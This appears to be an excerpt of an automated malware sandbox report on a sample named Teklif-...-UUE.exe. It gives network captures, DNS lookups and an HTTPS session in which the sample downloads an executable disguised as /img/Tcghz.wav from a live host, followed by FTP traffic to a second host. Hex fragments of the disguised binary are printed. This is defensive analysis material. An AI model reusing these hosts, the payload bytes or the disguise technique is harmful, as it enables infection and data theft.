                                                        Sep 27, 2024 10:43:56.054594994 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.055238962 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.055320024 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.055371046 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.055443048 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.055644035 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.055707932 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.055825949 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.055882931 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.138758898 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.138829947 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139000893 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.139059067 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139343977 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.139405966 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139508009 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.139575958 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139739037 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.139802933 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139991999 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140058041 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140223980 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140319109 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140448093 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140508890 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140671015 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140738964 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140867949 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140933990 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141021967 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.141077042 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141294956 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.141347885 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141467094 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.141522884 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141850948 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.141911030 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.142046928 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.142102957 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.142195940 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.142251015 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.224783897 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.224956036 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.224966049 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.224988937 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.225033045 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.225220919 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.225285053 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.225379944 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.225450039 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.225686073 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.225750923 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.225860119 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.225928068 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.226063013 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.226126909 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.226320028 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.226382017 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.226572990 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.226632118 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.226810932 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.226865053 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.227056980 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.227152109 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.227468967 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.227525949 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.227633953 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.227693081 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.227777958 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.227839947 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.228003025 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.228059053 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.228210926 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.228271008 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.228305101 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.228354931 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.228363037 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.228380919 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.228401899 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.228434086 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.235898972 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:44:00.230029106 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:00.235095024 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:00.235217094 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:00.846366882 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:00.877207041 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:00.882242918 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.104191065 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.104353905 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:01.106745958 CEST4970521192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:01.109198093 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.356802940 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.361618042 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:01.366503954 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.584502935 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.584752083 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:01.589731932 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.805085897 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:01.805367947 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:01.810285091 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.025809050 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.026000023 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.030790091 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.246365070 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.247358084 CEST5207960855192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.252193928 CEST60855520795.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.252278090 CEST5207960855192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.252408028 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.258636951 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.871179104 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.871510983 CEST5207960855192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.871614933 CEST5207960855192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.880040884 CEST60855520795.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.882654905 CEST60855520795.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:02.882715940 CEST5207960855192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:02.924896002 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:03.096740961 CEST21520785.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:03.143671989 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:08.392204046 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:08.398726940 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:08.399534941 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.020767927 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.021080017 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.026089907 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.245609045 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.245783091 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.250775099 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.495488882 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.495642900 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.500494003 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.707575083 CEST5207821192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.720036030 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.720227003 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.725250959 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.944448948 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:09.944714069 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:09.949595928 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:10.169923067 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:10.170335054 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:10.175273895 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:10.394684076 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:10.395602942 CEST5208152109192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:10.400418043 CEST52109520815.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:10.402652979 CEST5208152109192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:10.402749062 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:10.407953978 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:11.022186995 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:11.022490978 CEST5208152109192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:11.022557974 CEST5208152109192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:11.027360916 CEST52109520815.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:11.027703047 CEST52109520815.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:11.027817011 CEST5208152109192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:11.065547943 CEST5208021192.168.2.55.2.84.236
                                                        Sep 27, 2024 10:44:11.247031927 CEST21520805.2.84.236192.168.2.5
                                                        Sep 27, 2024 10:44:11.299962997 CEST5208021192.168.2.55.2.84.236

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 27, 2024 10:43:21.941817999 CEST5054253192.168.2.51.1.1.1
                                                        Sep 27, 2024 10:43:22.182703972 CEST53505421.1.1.1192.168.2.5
                                                        Sep 27, 2024 10:43:36.798351049 CEST6020153192.168.2.51.1.1.1
                                                        Sep 27, 2024 10:43:37.013014078 CEST53602011.1.1.1192.168.2.5
                                                        Sep 27, 2024 10:43:42.574939966 CEST53640611.1.1.1192.168.2.5
                                                        Sep 27, 2024 10:43:44.042215109 CEST53600111.1.1.1192.168.2.5
                                                        Sep 27, 2024 10:43:45.988929033 CEST5556553192.168.2.51.1.1.1
                                                        Sep 27, 2024 10:43:45.996412992 CEST53555651.1.1.1192.168.2.5
                                                        Sep 27, 2024 10:43:53.701389074 CEST6453453192.168.2.51.1.1.1
                                                        Sep 27, 2024 10:43:53.976898909 CEST53645341.1.1.1192.168.2.5
                                                        Sep 27, 2024 10:44:00.126416922 CEST5246353192.168.2.51.1.1.1
                                                        Sep 27, 2024 10:44:00.221124887 CEST53524631.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 27, 2024 10:43:21.941817999 CEST192.168.2.51.1.1.10xfe12Standard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:43:36.798351049 CEST192.168.2.51.1.1.10xeef1Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:43:45.988929033 CEST192.168.2.51.1.1.10x6e5aStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                        Sep 27, 2024 10:43:53.701389074 CEST192.168.2.51.1.1.10xd6f1Standard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:44:00.126416922 CEST192.168.2.51.1.1.10x9662Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 27, 2024 10:43:22.182703972 CEST1.1.1.1192.168.2.50xfe12No error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:43:37.013014078 CEST1.1.1.1192.168.2.50xeef1No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:43:45.996412992 CEST1.1.1.1192.168.2.50x6e5aName error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                        Sep 27, 2024 10:43:53.976898909 CEST1.1.1.1192.168.2.50xd6f1No error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                                        Sep 27, 2024 10:44:00.221124887 CEST1.1.1.1192.168.2.50x9662No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • wymascensores.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54970467.212.175.1624433060C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-27 08:43:22 UTC80OUTGET /img/Tcghz.wav HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
                                                        2024-09-27 08:43:22 UTC211INHTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:43:22 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 26 Sep 2024 07:21:12 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1917952
                                                        Connection: close
                                                        Content-Type: audio/x-wav
                                                        2024-09-27 08:43:22 UTC7981INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                        2024-09-27 08:43:22 UTC8000INData Raw: 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 33 36 30 30 30 30 30 34 32 30 31 45 30 30 30 30 30 30 33 38 46 39 46 38 46 46 46 46 32 30 46 39 33 31 38 39 36 39 32 30 30 36 42 38 37 30 36 31 36 31 37 45 38 36 30 32 30 30 30 34 37 42 37 41 30 32 30 30 30 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 30 31 38 32 31 46 31 32 42 32 30 30 36 30 30 30 30 30 30 36 32 32 30 45 46 38 42 43 43 38 35 36 31 37 45 38 36 30 32 30 30 30 34 37 42 35 32 30 32 30 30 30 34 36 31 37 45 43 45 30 32 30 30 30 34 32 38 34 38 30 39 30 30 30 36 32 38 31 33 30 30 30 30 32 42 38 30 33 34 30 30 30 30 30 34 32 30 30 39 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 39 37 46 38 46 46 46 46 32 30 43 33
                                                        Data Ascii: 4617ECE0200042848090006281200002B8036000004201E00000038F9F8FFFF20F93189692006B87061617E860200047B7A020004617ECE0200042848090006201821F12B20060000006220EF8BCC85617E860200047B52020004617ECE0200042848090006281300002B80340000042009000000FE0E00003897F8FFFF20C3
                                                        2024-09-27 08:43:22 UTC8000INData Raw: 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 37 41 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 42 34 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 35 30 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 37 32 41 30 30
                                                        Data Ascii: 2000000FE0E00003800000000FE0C000045030000002E000000050000002F00000038290000007EAA02000428B808000620000000007E860200047B7A0200043ACCFFFFFF26200000000038C1FFFFFF2A7EA902000428B408000620010000007E860200047B5002000439A2FFFFFF2620010000003897FFFFFF120000172A00
                                                        2024-09-27 08:43:22 UTC8000INData Raw: 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 38 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 42 34 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 35 42 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30
                                                        Data Ascii: 000050000002F00000038290000007EAA02000428B808000620000000007E860200047B830200043ACCFFFFFF26200000000038C1FFFFFF2A7EA902000428B408000620010000007E860200047B5B0200043AA2FFFFFF2620000000003897FFFFFF120000162A000000120000172A000000120000172A000000120000142A00
                                                        2024-09-27 08:43:22 UTC8000INData Raw: 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 41 30 32 30 30 30 34 32 38 42 38 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 38 36 30 32 30 30 30 34 37 42 38 30 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30
                                                        Data Ascii: 0000038C1FFFFFF2A7EAA02000428B808000620020000007E860200047B800200043AA2FFFFFF2620000000003897FFFFFF120000002A000000120000142A000000120000002A000000120000002A000000120000002A000000120000142A000000120000002A000000120000172A000000120000142A000000120000172A00
                                                        2024-09-27 08:43:23 UTC8000INData Raw: 30 30 30 39 34 30 30 30 30 30 30 41 37 30 30 30 30 30 30 33 42 30 31 30 30 30 30 37 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 35 38 30 30 30 30 30 30 35 39 30 31 30 30 30 30 42 31 30 31 30 30 30 30 37 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 30 31 31 43 30 30 30 30 30 32 30 30 36 45 30 30 31 39 38 37 30 30 30 44 30 30 30 30 30 30 30 30 30 32 30 30 39 44 30 30 32 33 43 30 30 30 30 46 30 30 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30
                                                        Data Ascii: 00094000000A70000003B0100007600000000000000020000005800000059010000B101000076000000000000001330040004000000000000000000142A1330050004000000000000000000142A0330080004000000000000000000142A011C000002006E001987000D0000000002009D0023C0000F00000000033008000400
                                                        2024-09-27 08:43:23 UTC8000INData Raw: 38 36 44 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 44 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 39 31 46 31 35 31 46 34 30 30 36 32 38 36 44 30 33 30 30 30 36 30 39 31 31 30 46 35 38 30 44 31 31 30 34 31 31 31 30 35 38 31 33 30 34 31 31 30 35 31 31 31 31 35 38 31 33 30 35 31 31 30 36 31 31 31 32 35 38 31 33 30 36 31 31 30 44 31 37 35 38
                                                        Data Ascii: 86D030006120411051106091F0D1F151F3C06286D03000612031104110511061A1C1F3D06286D030006120609110411051F0B1F0A1F3E06286D03000612051106091104181F0F1F3F06286D030006120411051106091F091F151F4006286D03000609110F580D110411105813041105111158130511061112581306110D1758
                                                        2024-09-27 08:43:23 UTC8000INData Raw: 30 32 38 43 42 30 33 30 30 30 36 31 31 31 39 32 38 43 43 30 33 30 30 30 36 31 33 31 30 31 31 31 39 32 30 38 36 30 30 30 30 30 30 36 41 32 38 42 39 30 33 30 30 30 36 31 31 31 37 32 38 43 39 30 33 30 30 30 36 31 33 31 43 31 31 31 39 31 31 31 30 32 38 42 39 30 33 30 30 30 36 31 31 30 36 31 31 31 39 31 31 31 43 31 46 32 38 35 41 31 31 32 37 32 38 43 38 30 33 30 30 30 36 31 31 31 39 32 38 43 43 30 33 30 30 30 36 31 33 31 34 33 41 41 31 46 42 46 46 46 46 32 30 31 46 30 30 30 30 30 30 32 38 44 41 30 33 30 30 30 36 33 39 41 41 46 39 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 39 46 46 39 46 46 46 46 44 44 43 46 31 37 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 32 38 44 39 30 33 30 30 30 36 33 41 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30
                                                        Data Ascii: 028CB030006111928CC0300061310111920860000006A28B9030006111728C9030006131C1119111028B903000611061119111C1F285A112728C8030006111928CC03000613143AA1FBFFFF201F00000028DA03000639AAF9FFFF262002000000389FF9FFFFDDCF17000026200000000028D90300063A0F0000002620000000
                                                        2024-09-27 08:43:23 UTC8000INData Raw: 30 32 30 42 42 30 30 30 30 30 30 32 30 33 45 30 30 30 30 30 30 35 39 39 43 32 30 34 45 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 32 30 31 37 30 30 30 30 30 30 32 30 32 42 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 32 30 30 32 30 30 30 30 30 30 32 30 36 35 30 30 30 30 30 30 35 38 46 45 30 45 30 45 30 30 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 30 45 30 30 39 43 46 45 30 43 31 44 30 30 32 30 30 30 30 30 30 30 30 30 32 30 35 32 30 30 30 30 30 30 32 30 37 35 30 30 30 30 30 30 35 38 39 43 32 30 38 46 30 30 30 30 30 30 32 30 32 37
                                                        Data Ascii: 020BB000000203E000000599C204E000000204700000058FE0E0E00FE0C1D002000000000FE0C0E009C2017000000202B00000058FE0E0E00FE0C1D002000000000FE0C0E009C2002000000206500000058FE0E0E00FE0C1D002000000000FE0C0E009CFE0C1D00200000000020520000002075000000589C208F0000002027
